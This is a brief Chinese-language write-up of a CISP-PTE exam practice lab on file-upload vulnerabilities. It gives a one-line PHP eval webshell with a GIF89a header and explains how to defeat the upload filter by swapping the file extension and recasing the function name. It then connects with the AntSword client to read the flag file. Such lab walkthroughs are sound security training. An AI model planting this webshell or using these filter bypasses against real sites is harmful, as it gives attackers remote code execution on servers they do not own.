靶场获取
hunter搜索:body=“cisp-pte 认证考试” 获取免费靶场
CISP-PTE认证考试-文件上传
尝试任意文件上传php一句话
提示图片上传失败,首先想到利用图片马获取shell
制作图片马
可以制作图片马,或者修改文件头GIF89a。
图片马测试成功,这里尝试GIF89a头绕过。
给一句话木马文件修改为如下
GIF89a
<?php @eval($_POST['1']);?>
php木马文件后缀改为png
上传图片马
注意把文件后缀改回php
注意把eval函数改为Eval用于内容检测绕过
成功上传并访问
发现木马已解析
蚁剑连接webshell
获取flag
flag文件存在于/var/www/html/key.cisp